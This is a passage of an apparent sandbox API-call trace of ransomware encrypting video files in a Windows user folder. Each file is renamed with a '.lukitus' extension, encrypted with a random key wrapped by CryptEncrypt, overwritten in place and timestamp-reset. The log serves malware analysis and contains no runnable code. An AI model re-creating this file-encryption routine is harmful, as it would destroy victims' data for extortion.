lpOverlapped=0x0) returned 1 [0109.229] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65220d10, dwHighDateTime=0x1d31760)) [0109.229] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.230] FlushFileBuffers (hFile=0x328) returned 1 [0109.232] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\ueTgIfGdCBC8HX.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\uetgifgdcbc8hx.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97305c0, ftCreationTime.dwHighDateTime=0x1d2fc97, ftLastAccessTime.dwLowDateTime=0xb2b88350, ftLastAccessTime.dwHighDateTime=0x1d30375, ftLastWriteTime.dwLowDateTime=0xb2b88350, ftLastWriteTime.dwHighDateTime=0x1d30375, nFileSizeHigh=0x0, nFileSizeLow=0x18bf2)) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.233] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\ueTgIfGdCBC8HX.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\uetgifgdcbc8hx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.233] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\ueTgIfGdCBC8HX.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\uetgifgdcbc8hx.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\F56924BE-9663-41BB-6CEE6528-76D95B986EF6.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\f56924be-9663-41bb-6cee6528-76d95b986ef6.lukitus"), dwFlags=0x9) returned 1 [0109.234] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.234] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.239] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x18bf2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x18bf2, lpOverlapped=0x0) returned 1 [0109.240] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.240] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x18bf2, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x18bf2, lpOverlapped=0x0) returned 1 [0109.240] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.241] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65220d10, dwHighDateTime=0x1d31760)) [0109.241] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.241] FlushFileBuffers (hFile=0x328) returned 1 [0109.244] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\_DXKgbJSQ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\_dxkgbjsq.avi"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d57890, ftCreationTime.dwHighDateTime=0x1d2fe2a, ftLastAccessTime.dwLowDateTime=0xe1d5bab0, ftLastAccessTime.dwHighDateTime=0x1d2f784, ftLastWriteTime.dwLowDateTime=0xe1d5bab0, ftLastWriteTime.dwHighDateTime=0x1d2f784, nFileSizeHigh=0x0, nFileSizeLow=0x47cb)) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.244] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\_DXKgbJSQ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\_dxkgbjsq.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.244] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\_DXKgbJSQ.avi" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\_dxkgbjsq.avi"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\7 hNkoOuqhuUPb4WBN\\F56924BE-9663-41BB-C00EFD39-06B140A3FA21.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\7 hnkoouqhuupb4wbn\\f56924be-9663-41bb-c00efd39-06b140a3fa21.lukitus"), dwFlags=0x9) returned 1 [0109.246] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.246] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.250] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x47cb, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x47cb, lpOverlapped=0x0) returned 1 [0109.251] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.251] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x47cb, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x47cb, lpOverlapped=0x0) returned 1 [0109.251] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.252] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65246e70, dwHighDateTime=0x1d31760)) [0109.252] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.252] FlushFileBuffers (hFile=0x328) returned 1 [0109.254] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\bRUXQf.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\bruxqf.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d55490, ftCreationTime.dwHighDateTime=0x1d2f603, ftLastAccessTime.dwLowDateTime=0xe50bb3c0, ftLastAccessTime.dwHighDateTime=0x1d2ff58, ftLastWriteTime.dwLowDateTime=0xe50bb3c0, ftLastWriteTime.dwHighDateTime=0x1d2ff58, nFileSizeHigh=0x0, nFileSizeLow=0xf2dc)) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.255] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\bRUXQf.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\bruxqf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.255] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\bRUXQf.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\bruxqf.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\F56924BE-9663-41BB-6295A539-7A67CBEDDB7F.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\f56924be-9663-41bb-6295a539-7a67cbeddb7f.lukitus"), dwFlags=0x9) returned 1 [0109.257] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.257] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.262] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xf2dc, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xf2dc, lpOverlapped=0x0) returned 1 [0109.263] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.263] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xf2dc, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xf2dc, lpOverlapped=0x0) returned 1 [0109.263] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.263] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6526cfd0, dwHighDateTime=0x1d31760)) [0109.263] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.264] FlushFileBuffers (hFile=0x328) returned 1 [0109.266] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\-SEWASLi_AhMGq.flv" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\-sewasli_ahmgq.flv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ecfcf0, ftCreationTime.dwHighDateTime=0x1d2f990, ftLastAccessTime.dwLowDateTime=0xfbc78100, ftLastAccessTime.dwHighDateTime=0x1d2fd07, ftLastWriteTime.dwLowDateTime=0xfbc78100, ftLastWriteTime.dwHighDateTime=0x1d2fd07, nFileSizeHigh=0x0, nFileSizeLow=0x8dfc)) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.267] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\-SEWASLi_AhMGq.flv" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\-sewasli_ahmgq.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.267] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\-SEWASLi_AhMGq.flv" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\-sewasli_ahmgq.flv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\F56924BE-9663-41BB-B99EF73A-C9F832ABEEC4.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\f56924be-9663-41bb-b99ef73a-c9f832abeec4.lukitus"), dwFlags=0x9) returned 1 [0109.269] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.269] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.274] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x8dfc, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x8dfc, lpOverlapped=0x0) returned 1 [0109.275] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.275] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x8dfc, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x8dfc, lpOverlapped=0x0) returned 1 [0109.275] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.275] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65293130, dwHighDateTime=0x1d31760)) [0109.275] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.276] FlushFileBuffers (hFile=0x328) returned 1 [0109.278] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\gq2odSlVTX32RO7-UPJ\\Herk5RK.avi" (normalized: "c:\\users\\aetadzjz\\videos\\gq2odslvtx32ro7-upj\\herk5rk.avi"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c1a33d0, ftCreationTime.dwHighDateTime=0x1d2fbb4, ftLastAccessTime.dwLowDateTime=0x51be7df0, ftLastAccessTime.dwHighDateTime=0x1d2fe90, ftLastWriteTime.dwLowDateTime=0x51be7df0, ftLastWriteTime.dwHighDateTime=0x1d2fe90, nFileSizeHigh=0x0, nFileSizeLow=0x6bbe)) returned 1 [0109.278] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.278] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.278] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.278] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.278] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.278] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 